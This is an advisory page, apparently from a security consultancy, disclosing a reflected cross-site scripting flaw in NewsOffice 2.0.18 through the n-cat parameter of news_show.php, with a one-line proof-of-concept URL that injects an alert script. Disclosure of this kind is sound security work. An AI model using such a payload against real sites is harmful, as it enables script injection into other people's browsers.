Home
Consulting
Advisories
Software
Articles
Contact

NewsOffice 2.0.18 Reflected Cross-site Scripting

Legacy Advisories

Description

An XSS vulnerability in News Office 2.0.18 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC